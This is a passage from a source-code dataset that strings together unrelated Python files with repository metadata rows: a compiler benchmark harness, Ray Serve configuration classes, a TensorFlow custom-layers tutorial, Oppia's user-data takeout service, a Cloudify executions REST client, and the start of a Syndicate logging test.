'-e',
type=str,
nargs='+',
help='experts (e.g., -e Expert1 Expert2)',
default=default_expert_list)
parser.add_argument(
'--dynamic_at_compile_time_list',
'-r',
type=_parse_dimension_list,
nargs='+',
help='dynamic at compile time dimensions (e.g., -r k,m k [])',
default=default_dynamic_at_compile_time_list)
parser.add_argument('--spec_list',
'-s',
type=str,
nargs='+',
help='problem specifications (e.g., -s mk,kn km,kn)',
default=default_spec_list)
parser.add_argument('--dump_data',
type=str,
nargs='?',
help='dump file (e.g., --dump_data /tmp/data.json)',
default='')
def test_argparser(benchmark_name: str, \
default_n_iters: int,
default_problem_sizes_list: Sequence[Sequence[int]],
default_expert_list: Sequence[str],
default_dynamic_at_compile_time_list: Sequence[Sequence[str]],
default_spec_list: Sequence[str]) -> argparse.Namespace:
"""Test argument parser.
Creates an argument parser and returns the parsed arguments.
Arguments:
benchmark_name: Benchmark name.
default_n_iters: Default number of iterations.
default_problem_sizes_list: Default problem sizes.
default_expert_list: Default experts.
default_dynamic_at_compile_time_list: Default dynamic at compile time dimensions.
default_spec_list: Default specification list.
"""
parser = argparse.ArgumentParser(description=benchmark_name)
add_argparser_arguments(
parser=parser,
benchmark_name=benchmark_name,
default_n_iters=default_n_iters,
default_problem_sizes_list=default_problem_sizes_list,
default_expert_list=default_expert_list,
default_dynamic_at_compile_time_list=default_dynamic_at_compile_time_list,
default_spec_list=default_spec_list)
return parser.parse_args(sys.argv[1:])
def test_sizes(dim_names: Sequence[str],
problem_sizes: ProblemSizes) -> dict[str, ProblemSizes]:
"""Annotate the problem size arguments with the given dimension names."""
return [{k: v for k, v in zip(dim_names, sizes)} for sizes in problem_sizes]
def test_experts(
all_experts: Sequence[TransformationList],
all_names: Sequence[str] = [],
expert_list: Sequence[str] = []) -> dict[str, TransformationList]:
"""Annotate the expert name and remove the experts not in expert list."""
assert len(all_experts) == len(all_names), "Expect one name per expert."
return {
k: v
for k, v in zip(all_names, all_experts)
if not expert_list or k in expert_list
}
def test_harness(problem_factory: Callable[
[Mapping[str, Any], Sequence[np.dtype]], ProblemDefinition],
np_types_list: Sequence[Sequence[np.dtype]],
problem_sizes_list: Sequence[Mapping[str, Any]],
experts: Union[Sequence[TransformationList],
Mapping[str, TransformationList]],
n_iters: int = 1,
function_name: str = 'tested_function',
dynamic_at_compile_time_sizes: AbstractSet[str] = set(),
**kwargs) -> Measurements:
"""Test runner facility.
Compiles and runs the a test or a benchmark for a cross-product of possible
argument types, problem sizes and compilation experts. Collects and prints the
results to the standard output.
Arguments:
problem_factory: A callable to construct a ProblemDefinition given the size
mapping and the argument type choice. May be called multiple times.
np_type_list: A list of elemental type lists to try (each inner list must have
as many entries as the problem has arguments).
problem_sizes_list: A list of size mappings to try.
experts: A sequence or dictionary of compilation experts to try.
n_iters: Number of times to run the test.
function_name: Name of the function in which the IR is emitted, this name can
be used by compilation experts to target the transformation.
dynamic_at_compile_time_sizes: A set of size keys that should be treated as unknown (-1)
at compilation time and only set at runtime.
Keyword arguments:
numpy_benchmark: A callable accepting a list of NumPy tensors, the current
size mapping and the type selection that performs the computation using
Numpy. If the `BENCHMARK_NUMPY` environment variable is set and the argument
is provided, it will be called `n_iters` times for the purpose of measuring
baseline performance.
pytorch_benchmark: A callable accepting a list of PyTorch tensors, the current
size mapping and the type selection that performs the computation using
PyTorch. If the `BENCHMARK_TORCH` environment variable is set and the
argument is provided, it will be called `n_iters` times for the purpose of
measuring baseline performance.
plot_path: A path to an existing directory to dump the performance plots.
backends: List of backends (containing 'strategy' or 'dialect', or both) to
use for compilation.
Returns: A dictionary of all collected benchmark results.
"""
# Generate expert names if none are provided.
if isinstance(experts, Sequence):
experts = {str(value): value for value in experts}
measurements = Measurements()
backends = kwargs.get("backends", ['strategy'])
for b in backends:
assert b in ('strategy', 'dialect'), "Unknown backend: " + str(b)
for np_types in np_types_list:
for problem_sizes_dict in problem_sizes_list:
compile_time_problem_sizes_dict = {
key: (value if key not in dynamic_at_compile_time_sizes else -1)
for key, value in problem_sizes_dict.items()
}
runtime_problem_sizes_dict = problem_sizes_dict
# Init printing.
print(
f'\n###############################################################\n'
f'Compile-time problem size {compile_time_problem_sizes_dict}\n'
f'Runtime problem size {runtime_problem_sizes_dict}\n'
f'Problem types {np_types}')
problem_definition = problem_factory(problem_sizes_dict, np_types)
gflops = problem_definition.gflop_count_builder(problem_sizes_dict)
gbytes = problem_definition.gbyte_count_builder(problem_sizes_dict,
np_types)
def run_problem_instance(instance: ProblemInstance, name: str):
timing_results = instance.run(
n_iters=n_iters,
entry_point_name='main',
runtime_problem_sizes_dict=runtime_problem_sizes_dict,
dump_obj_to_file=kwargs.get('dump_obj_to_file', ''))
print(f'Run time {time.time() - start}')
measurements.append(
function_name,
name,
np_types,
dynamic_at_compile_time_sizes,
runtime_problem_sizes_dict,
gflops,
gbytes,
timing_results,
)
for expert_name, expert in experts.items():
print(f'\nCompilation expert {expert_name}')
if 'dialect' in backends:
print("xxxxxxxxxx: Dialect:")
problem_tx = ProblemInstance(problem_definition, np_types)
start = time.time()
problem_tx.compile_with_schedule_builder(
entry_point_name='main',
fun_to_benchmark_name=function_name,
compile_time_problem_sizes_dict=compile_time_problem_sizes_dict,
schedule_builder=lambda m: emit_schedule_dialect(m, expert),
dump_ir_to_file=kwargs.get('dump_tx_ir_to_file', ''),
zero_at_each_iteration=kwargs.get('zero_at_each_iteration', False))
print(f'Compile time {time.time() - start}')
run_problem_instance(problem_tx, expert_name + '_dialect')
if 'strategy' in backends:
print("xxxxxxxxxx: Strategy:")
problem = ProblemInstance(problem_definition, np_types)
start = time.time()
problem.compile(
entry_point_name='main',
fun_to_benchmark_name=function_name,
compile_time_problem_sizes_dict=compile_time_problem_sizes_dict,
transform=expert,
dump_ir_to_file=kwargs.get('dump_ir_to_file', ''),
zero_at_each_iteration=kwargs.get('zero_at_each_iteration', False))
print(f'Compile time {time.time() - start}')
run_problem_instance(problem, expert_name + "_strategy")
if 'numpy_benchmark' in kwargs and os.environ.get('BENCHMARK_NUMPY'):
print('\nNumPy reference\n')
args = problem_definition.tensors_np_builder(problem_sizes_dict,
np_types)
timing_results = timed_invoke(
lambda n: _run_benchmark_n_iters(kwargs['numpy_benchmark'], n, args,
problem_sizes_dict, np_types),
gflops, gbytes, n_iters)
measurements.append(function_name, 'numpy', np_types,
dynamic_at_compile_time_sizes,
runtime_problem_sizes_dict, gflops, gbytes,
timing_results)
if 'pytorch_benchmark' in kwargs and os.environ.get('BENCHMARK_TORCH'):
print('\nPyTorch reference\n')
import torch
torch.set_num_threads(1)
numpy_args = problem_definition.tensors_np_builder(
problem_sizes_dict, np_types)
args = list(map(torch.from_numpy, numpy_args))
timing_results = timed_invoke(
lambda n: _run_benchmark_n_iters(kwargs[
'pytorch_benchmark'], n, args, problem_sizes_dict, np_types),
gflops, gbytes, n_iters)
measurements.append(function_name, 'pytorch', np_types,
dynamic_at_compile_time_sizes,
runtime_problem_sizes_dict, gflops, gbytes,
timing_results)
file_name = kwargs.get('dump_data_to_file', '')
if file_name != '':
# measurements.dump_to_file(file_name)
measurements.dump_raw_to_file(file_name)
return measurements
| 39.920567 | 90 | 0.663267 |
a73da5149cabf96aace7a0cad57ae4f64e6425bb | 6,633 | py | Python | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 1 | 2021-09-14T15:14:05.000Z | 2021-09-14T15:14:05.000Z | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 66 | 2021-02-23T19:49:27.000Z | 2022-03-05T08:04:38.000Z | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 1 | 2020-01-16T20:52:25.000Z | 2020-01-16T20:52:25.000Z | import inspect
from enum import Enum
from typing import Any, List, Optional
import pydantic
from pydantic import BaseModel, PositiveInt, validator, NonNegativeFloat
from ray.serve.constants import DEFAULT_HTTP_HOST, DEFAULT_HTTP_PORT
class BackendConfig(BaseModel):
"""Configuration options for a backend, to be set by the user.
Args:
num_replicas (Optional[int]): The number of processes to start up that
will handle requests to this backend. Defaults to 1.
max_concurrent_queries (Optional[int]): The maximum number of queries
that will be sent to a replica of this backend without receiving a
response. Defaults to 100.
user_config (Optional[Any]): Arguments to pass to the reconfigure
method of the backend. The reconfigure method is called if
user_config is not None.
experimental_graceful_shutdown_wait_loop_s (Optional[float]): Duration
that backend workers will wait until there is no more work to be
done before shutting down. Defaults to 2s.
experimental_graceful_shutdown_timeout_s (Optional[float]):
Controller waits for this duration to forcefully kill the replica
for shutdown. Defaults to 20s.
"""
num_replicas: PositiveInt = 1
max_concurrent_queries: Optional[int] = None
user_config: Any = None
experimental_graceful_shutdown_wait_loop_s: NonNegativeFloat = 2.0
experimental_graceful_shutdown_timeout_s: NonNegativeFloat = 20.0
class Config:
validate_assignment = True
extra = "forbid"
arbitrary_types_allowed = True
# Dynamic default for max_concurrent_queries
@validator("max_concurrent_queries", always=True)
def set_max_queries_by_mode(cls, v, values): # noqa 805
if v is None:
v = 100
else:
if v <= 0:
raise ValueError("max_concurrent_queries must be >= 0")
return v
class ReplicaConfig:
def __init__(self, backend_def, *init_args, ray_actor_options=None):
self.backend_def = backend_def
self.init_args = init_args
if ray_actor_options is None:
self.ray_actor_options = {}
else:
self.ray_actor_options = ray_actor_options
self.resource_dict = {}
self._validate()
def _validate(self):
# Validate that backend_def is an import path, function, or class.
if isinstance(self.backend_def, str):
pass
elif inspect.isfunction(self.backend_def):
if len(self.init_args) != 0:
raise ValueError(
"init_args not supported for function backend.")
elif not inspect.isclass(self.backend_def):
raise TypeError(
"Backend must be a function or class, it is {}.".format(
type(self.backend_def)))
if "placement_group" in self.ray_actor_options:
raise ValueError("Providing placement_group for backend actors "
"is not currently supported.")
if not isinstance(self.ray_actor_options, dict):
raise TypeError("ray_actor_options must be a dictionary.")
elif "lifetime" in self.ray_actor_options:
raise ValueError(
"Specifying lifetime in init_args is not allowed.")
elif "name" in self.ray_actor_options:
raise ValueError("Specifying name in init_args is not allowed.")
elif "max_restarts" in self.ray_actor_options:
raise ValueError("Specifying max_restarts in "
"init_args is not allowed.")
else:
# Ray defaults to zero CPUs for placement, we default to one here.
if "num_cpus" not in self.ray_actor_options:
self.ray_actor_options["num_cpus"] = 1
num_cpus = self.ray_actor_options["num_cpus"]
if not isinstance(num_cpus, (int, float)):
raise TypeError(
"num_cpus in ray_actor_options must be an int or a float.")
elif num_cpus < 0:
raise ValueError("num_cpus in ray_actor_options must be >= 0.")
self.resource_dict["CPU"] = num_cpus
num_gpus = self.ray_actor_options.get("num_gpus", 0)
if not isinstance(num_gpus, (int, float)):
raise TypeError(
"num_gpus in ray_actor_options must be an int or a float.")
elif num_gpus < 0:
raise ValueError("num_gpus in ray_actor_options must be >= 0.")
self.resource_dict["GPU"] = num_gpus
memory = self.ray_actor_options.get("memory", 0)
if not isinstance(memory, (int, float)):
raise TypeError(
"memory in ray_actor_options must be an int or a float.")
elif memory < 0:
raise ValueError("num_gpus in ray_actor_options must be >= 0.")
self.resource_dict["memory"] = memory
object_store_memory = self.ray_actor_options.get(
"object_store_memory", 0)
if not isinstance(object_store_memory, (int, float)):
raise TypeError(
"object_store_memory in ray_actor_options must be "
"an int or a float.")
elif object_store_memory < 0:
raise ValueError(
"object_store_memory in ray_actor_options must be >= 0.")
self.resource_dict["object_store_memory"] = object_store_memory
custom_resources = self.ray_actor_options.get("resources", {})
if not isinstance(custom_resources, dict):
raise TypeError(
"resources in ray_actor_options must be a dictionary.")
self.resource_dict.update(custom_resources)
class DeploymentMode(str, Enum):
NoServer = "NoServer"
HeadOnly = "HeadOnly"
EveryNode = "EveryNode"
class HTTPOptions(pydantic.BaseModel):
# Documentation inside serve.start for user's convenience.
host: Optional[str] = DEFAULT_HTTP_HOST
port: int = DEFAULT_HTTP_PORT
middlewares: List[Any] = []
location: Optional[DeploymentMode] = DeploymentMode.HeadOnly
num_cpus: int = 0
@validator("location", always=True)
def location_backfill_no_server(cls, v, values):
if values["host"] is None or v is None:
return DeploymentMode.NoServer
return v
class Config:
validate_assignment = True
extra = "forbid"
arbitrary_types_allowed = True
| 40.944444 | 79 | 0.630484 |
2d5603070f2aee059cf4cb6eb125961327384e72 | 4,842 | py | Python | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
sys.path.append('./')
sys.path.append('../../')
from lab_utils import (
tf, os, np, plt, logger, ap, BooleanAction,
debug, toc, auto_increment
)
ap.add_argument('--epochs', type=int, default=10, help='number of epochs: 10*')
ap.add_argument('--batch', type=int, default=64, help='batch size: 64*')
args, extra_args = ap.parse_known_args()
logger.info(args)
# logger.info(extra_args)
if args.all:
args.step = 0 # forced to 0
if args.debug:
import pdb
import rlcompleter
pdb.Pdb.complete=rlcompleter.Completer(locals()).complete
# import code
# code.interact(local=locals())
debug = breakpoint
import time
### TOC
if args.step == 0:
toc(__file__)
args.step = auto_increment(args.step, args.all)
### Step #1 - Layers: common sets of useful operations
if args.step == 1:
print("\n### Step #1 - Layers: common sets of useful operations")
# In the tf.keras.layers package, layers are objects. To construct a layer,
# simply construct the object. Most layers take as a first argument the number
# of output dimensions / channels.
layer = tf.keras.layers.Dense(100)
# The number of input dimensions is often unnecessary, as it can be inferred
# the first time the layer is used, but it can be provided if you want to
# specify it manually, which is useful in some complex models.
layer = tf.keras.layers.Dense(10, input_shape=(None, 5))
logger.info('To use a layer, simply call it')
print(layer(tf.zeros([10, 5])), '\n')
# Layers have many useful methods. For example, you can inspect all variables
# in a layer using `layer.variables` and trainable variables using
# `layer.trainable_variables`. In this case a fully-connected layer
# will have variables for weights and biases.
logger.info('layer.variables:')
print(layer.variables, '\n')
logger.info('The variables are also accessible through nice accessors:')
print(layer.kernel)
print(layer.bias)
args.step = auto_increment(args.step, args.all)
### Step #2 - Implementing custom layers
if args.step == 2:
print("\n### Step #2 - Implementing custom layers")
class MyDenseLayer(tf.keras.layers.Layer):
def __init__(self, num_outputs):
super(MyDenseLayer, self).__init__()
self.num_outputs = num_outputs
def build(self, input_shape):
self.kernel = self.add_weight(
"kernel",
shape=[int(input_shape[-1]), self.num_outputs]
)
def call(self, inputs):
return tf.matmul(inputs, self.kernel)
layer = MyDenseLayer(10)
_ = layer(tf.zeros([10, 5])) # Calling the layer `.builds` it.
logger.info('layer.trainable_variables:')
print([var.name for var in layer.trainable_variables])
args.step = auto_increment(args.step, args.all)
### Step #3 - Models: Composing layers
if args.step == 3:
print("\n### Step #3 - Models: Composing layers")
class ResnetIdentityBlock(tf.keras.Model):
def __init__(self, kernel_size, filters):
super(ResnetIdentityBlock, self).__init__(name='')
filters1, filters2, filters3 = filters
self.conv2a = tf.keras.layers.Conv2D(filters1, (1, 1))
self.bn2a = tf.keras.layers.BatchNormalization()
self.conv2b = tf.keras.layers.Conv2D(filters2, kernel_size, padding='same')
self.bn2b = tf.keras.layers.BatchNormalization()
self.conv2c = tf.keras.layers.Conv2D(filters3, (1, 1))
self.bn2c = tf.keras.layers.BatchNormalization()
def call(self, input_tensor, training=False):
x = self.conv2a(input_tensor)
x = self.bn2a(x, training=training)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x, training=training)
x = tf.nn.relu(x)
x = self.conv2c(x)
x = self.bn2c(x, training=training)
x += input_tensor
return tf.nn.relu(x)
block = ResnetIdentityBlock(1, [1, 2, 3])
_ = block(tf.zeros([1, 2, 3, 3]))
logger.info('block.layers:')
print(*[layer for layer in block.layers], sep='\n')
logger.info(f'len(block.variables): {len(block.variables)}')
block.summary()
my_seq = tf.keras.Sequential([
tf.keras.layers.Conv2D(1, (1, 1), input_shape=(None, None, 3)),
tf.keras.layers.BatchNormalization(),
tf.keras.layers.Conv2D(2, 1, padding='same'),
tf.keras.layers.BatchNormalization(),
tf.keras.layers.Conv2D(3, (1, 1)),
tf.keras.layers.BatchNormalization()
])
logger.info('my_seq(tf.zeros([1, 2, 3, 3])):')
print(my_seq(tf.zeros([1, 2, 3, 3])), '\n')
my_seq.summary()
### End of File
print()
if args.plot:
plt.show()
debug()
| 30.840764 | 87 | 0.633622 |
cba4661b0b5213db3a22e576eb73cf6308f4ba03 | 5,262 | py | Python | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 1 | 2021-12-17T15:21:23.000Z | 2021-12-17T15:21:23.000Z | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to export the data of all user related models from a given
user_id.
"""
from __future__ import annotations
import json
import logging
import re
from core import feconf
from core.domain import takeout_domain
from core.domain import user_services
from core.platform import models
(
base_models, collection_models, email_models,
exploration_models, feedback_models, topic_models,
suggestion_models, user_models) = models.Registry.import_models(
[models.NAMES.base_model, models.NAMES.collection, models.NAMES.email,
models.NAMES.exploration, models.NAMES.feedback, models.NAMES.topic,
models.NAMES.suggestion, models.NAMES.user])
def get_models_which_should_be_exported():
"""Returns list of models to export.
Returns:
list(datastore_services.Model). List of models whose data should be
exported.
"""
exempt_base_classes = [
'BaseCommitLogEntryModel',
'BaseMapReduceBatchResultsModel',
'BaseModel',
'BaseSnapshotContentModel',
'BaseSnapshotMetadataModel',
'VersionedModel',
]
return [model_class for model_class in
models.Registry.get_all_storage_model_classes()
if model_class.get_model_association_to_user() !=
base_models.MODEL_ASSOCIATION_TO_USER.NOT_CORRESPONDING_TO_USER and
not model_class.__name__ in exempt_base_classes]
def export_data_for_user(user_id):
"""Exports selected models according to model defined export_data functions.
Args:
user_id: str. The user_id of the user whose data is being exported.
Returns:
dict. Dictionary containing all user data in the following format:
{
<MODEL_NAME>_data: <dict of data in format as specified by
model export policy>
}.
Raises:
NotImplementedError. Takeout for profile users is not implemented.
"""
user_settings = user_services.get_user_settings(user_id)
if user_settings is not None and (
feconf.ROLE_ID_MOBILE_LEARNER in user_settings.roles):
raise NotImplementedError(
'Takeout for profile users is not yet supported.')
exported_data = {}
models_to_export = get_models_which_should_be_exported()
for model in models_to_export:
split_name = re.findall('[A-Z][^A-Z]*', model.__name__)[:-1]
# Join the split name with underscores and add _data for final name.
exported_model_data = model.export_data(user_id)
exported_model_data_json_string = json.dumps(exported_model_data)
user_id_match_object = re.search(
feconf.USER_ID_REGEX, exported_model_data_json_string)
if user_id_match_object:
logging.error(
'[TAKEOUT] User ID (%s) found in the JSON generated '
'for %s and user with ID %s' % (
user_id_match_object.group(0), model.__name__, user_id
)
)
final_name = ('_').join([x.lower() for x in split_name])
exported_data[final_name] = exported_model_data
# Separate out images. We store the images that need to be separated here
# as a dictionary mapping tuples to strings. The tuple value indicates the
# "path" to take to the image in the user's data dictionary, and the string
# indicates the filename that the exported image will be saved to.
replacement_instructions = [
takeout_domain.TakeoutImageReplacementInstruction(
('user_settings', 'profile_picture_data_url'),
'user_settings_profile_picture.png',
'profile_picture_filename'
)
]
takeout_image_files = []
for replacement_instruction in replacement_instructions:
dictionary_path = replacement_instruction.dictionary_path
replacement_filename = replacement_instruction.export_filename
replacement_key = replacement_instruction.new_key
# Move pointer to the position indicated by the tuple.
pointer = exported_data
for key in dictionary_path[:-1]:
pointer = pointer[key]
# Swap out data with replacement filename.
image_key = dictionary_path[-1]
image_data = pointer[image_key]
if image_data is not None:
takeout_image_files.append(
takeout_domain.TakeoutImage(image_data, replacement_filename))
pointer[image_key] = replacement_filename
# Rename the key.
pointer[replacement_key] = pointer.pop(image_key)
return takeout_domain.TakeoutData(exported_data, takeout_image_files)
| 38.130435 | 80 | 0.695553 |
aec7d7cfb8c57fe87b8eb85cb4a0ce98e4bddb01 | 11,884 | py | Python | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | ########
# Copyright (c) 2014-2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from cloudify_rest_client.responses import ListResponse
class Execution(dict):
"""Cloudify workflow execution."""
TERMINATED = 'terminated'
FAILED = 'failed'
CANCELLED = 'cancelled'
PENDING = 'pending'
STARTED = 'started'
CANCELLING = 'cancelling'
FORCE_CANCELLING = 'force_cancelling'
KILL_CANCELLING = 'kill_cancelling'
QUEUED = 'queued'
SCHEDULED = 'scheduled'
END_STATES = [TERMINATED, FAILED, CANCELLED]
def __init__(self, execution):
self.update(execution)
if self.status:
# default to status for compatibility with pre-4.4 managers
self.setdefault('status_display', self.status)
@property
def id(self):
"""
:return: The execution's id.
"""
return self.get('id')
@property
def deployment_id(self):
"""
:return: The deployment's id this execution is related to.
"""
return self.get('deployment_id')
@property
def blueprint_id(self):
"""
:return: The deployment's main blueprint id this execution is
related to.
"""
return self.get('blueprint_id')
@property
def status(self):
"""
:return: The execution's status.
"""
return self.get('status')
@property
def status_display(self):
"""
:return: The human-readable form of the execution's status.
"""
return self.get('status_display')
@property
def error(self):
"""
:return: The execution error in a case of failure, otherwise None.
"""
return self.get('error')
@property
def workflow_id(self):
"""
:return: The id of the workflow this execution represents.
"""
return self.get('workflow_id')
@property
def parameters(self):
"""
:return: The execution's parameters
"""
return self.get('parameters') or {}
@property
def is_system_workflow(self):
"""
:return: True if the workflow executed is a system workflow, otherwise
False
"""
return self.get('is_system_workflow', False)
@property
def created_at(self):
"""
:return: The execution creation time.
"""
return self.get('created_at')
@property
def started_at(self):
"""
:return: The execution start time.
"""
return self.get('started_at')
@property
def ended_at(self):
"""
:return: The execution end time.
"""
return self.get('ended_at')
@property
def created_by(self):
"""
:return: The name of the execution creator.
"""
return self.get('created_by')
@property
def scheduled_for(self):
"""
:return: The time this execution is scheduled for (if any)
"""
return self.get('scheduled_for')
@property
def is_dry_run(self):
"""
:return: True if the execution was performed as a dry run
"""
return self.get('is_dry_run', False)
class ExecutionsClient(object):
def __init__(self, api):
self.api = api
self._uri_prefix = 'executions'
self._wrapper_cls = Execution
def _create_filters(
self,
deployment_id=None,
include_system_workflows=False,
sort=None,
is_descending=False,
**kwargs
):
params = {'_include_system_workflows': include_system_workflows}
if deployment_id:
params['deployment_id'] = deployment_id
params.update(kwargs)
if sort:
params['_sort'] = '-' + sort if is_descending else sort
return params
def should_start(self, execution_id):
"""
Check if an execution can currently start running (no system exeuctions
/ executions under the same deployment are currently running).
:param execution_id: Id of the executions that needs to be checked.
:return: Whether or not this execution can currently start
"""
assert execution_id
uri = '/{self._uri_prefix}/{id}/should-start'.format(
self=self, id=execution_id)
response = self.api.get(uri)
return response
def list(self, _include=None, **kwargs):
"""Returns a list of executions.
:param deployment_id: Optional deployment id to get executions for.
:param include_system_workflows: Include executions of system
workflows
:param _include: List of fields to include in response.
:param sort: Key for sorting the list.
:param is_descending: True for descending order, False for ascending.
:param kwargs: Optional filter fields. For a list of available fields
see the REST service's models.Execution.fields
:return: Executions list.
"""
params = self._create_filters(**kwargs)
response = self.api.get(
'/{self._uri_prefix}'.format(self=self),
params=params,
_include=_include)
return ListResponse(
[self._wrapper_cls(item) for item in response['items']],
response['metadata']
)
def get(self, execution_id, _include=None):
"""Get execution by its id.
:param execution_id: Id of the execution to get.
:param _include: List of fields to include in response.
:return: Execution.
"""
assert execution_id
uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
response = self.api.get(uri, _include=_include)
return self._wrapper_cls(response)
def update(self, execution_id, status, error=None):
"""Update execution with the provided status and optional error.
:param execution_id: Id of the execution to update.
:param status: Updated execution status.
:param error: Updated execution error (optional).
:return: Updated execution.
"""
uri = '/executions/{0}'.format(execution_id)
params = {'status': status}
if error:
params['error'] = error
response = self.api.patch(uri, data=params)
return Execution(response)
def start(self, deployment_id, workflow_id, parameters=None,
allow_custom_parameters=False, force=False, dry_run=False,
queue=False, schedule=None, wait_after_fail=600):
"""Starts a deployment's workflow execution whose id is provided.
:param deployment_id: The deployment's id to execute a workflow for.
:param workflow_id: The workflow to be executed id.
:param parameters: Parameters for the workflow execution.
:param allow_custom_parameters: Determines whether to allow\
parameters which weren't defined in the workflow parameters schema\
in the blueprint.
:param force: Determines whether to force the execution of the\
workflow in a case where there's an already running execution for\
this deployment.
:param dry_run: If set to true, no actual actions will be performed.\
This is a dry run of the execution
:param queue: If set, blocked executions will be queued and
automatically run when possible
:param schedule: A string representing the date and time this
workflow should be executed at. If not passed this workflow will be
executed immediately.
:raises: IllegalExecutionParametersError
:return: The created execution.
"""
assert deployment_id
assert workflow_id
data = {
'deployment_id': deployment_id,
'workflow_id': workflow_id,
'parameters': parameters,
'allow_custom_parameters': str(allow_custom_parameters).lower(),
'force': str(force).lower(),
'dry_run': str(dry_run).lower(),
'queue': str(queue).lower(),
'scheduled_time': schedule,
'wait_after_fail': wait_after_fail
}
uri = '/executions'
response = self.api.post(uri,
data=data,
expected_status_code=201)
return Execution(response)
def cancel(self, execution_id, force=False, kill=False):
"""Cancels the execution which matches the provided execution id.
:param execution_id: Id of the execution to cancel.
:param force: Boolean describing whether to send a 'cancel' or a 'force-cancel' action # NOQA
:return: Cancelled execution.
"""
uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
action = 'kill' if kill else 'force-cancel' if force else 'cancel'
response = self.api.post(uri,
data={'action': action},
expected_status_code=200)
return self._wrapper_cls(response)
def resume(self, execution_id, force=False):
"""Resume an execution.
:param execution_id: Id of the execution to resume.
:param force: Whether to resume failed/cancelled executions by
retrying their failed tasks.
:return: Resumed execution.
"""
uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
action = 'force-resume' if force else 'resume'
response = self.api.post(uri,
data={'action': action},
expected_status_code=200)
return self._wrapper_cls(response)
def requeue(self, execution_id):
"""
Requeue an execution (e.g. after snapshot restore).
:param execution_id: Id of the execution to be requeued.
:return: Requeued execution.
"""
uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
response = self.api.post(uri,
data={'action': 'requeue'},
expected_status_code=200)
return self._wrapper_cls(response)
def delete(self, to_datetime=None, keep_last=None, **kwargs):
"""Deletes finished executions from the DB.
:param to_datetime: Until which timestamp to delete executions
:param keep_last: How many most recent executions to keep from deletion
:param kwargs: Optional filter fields. For a list of available fields
see the REST service's models.Execution.fields
:return: List of deleted executions.
Parameters `to_datetime` and `keep_last` are mutually-exclusive.
"""
data = {}
if to_datetime:
data['to_datetime'] = to_datetime.isoformat()
if keep_last:
data['keep_last'] = keep_last
response = self.api.delete('/{self._uri_prefix}'.format(self=self),
data=data,
params=kwargs,
expected_status_code=200)
return response['items'][0]['count']
| 34.546512 | 102 | 0.601313 |
7a41e499308001fc20b42aeeaaec516d7f458cb7 | 2,468 | py | Python | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Syndicate Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test debug logging."""
import os
from test_framework.test_framework import SyndicateTestFramework
class LoggingTest(SyndicateTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
# test default log file name
assert os.path.isfile(os.path.join(self.nodes[0].datadir, "regtest", "debug.log"))
# test alternative log file name in datadir
self.restart_node(0, ["-debuglogfile=foo.log"])
assert os.path.isfile(os.path.join(self.nodes[0].datadir, "regtest", "foo.log"))
# test alternative log file name outside datadir
tempname = os.path.join(self.options.tmpdir, "foo.log")
self.restart_node(0, ["-debuglogfile=%s" % tempname])
assert os.path.isfile(tempname)
# check that invalid log (relative) will cause error
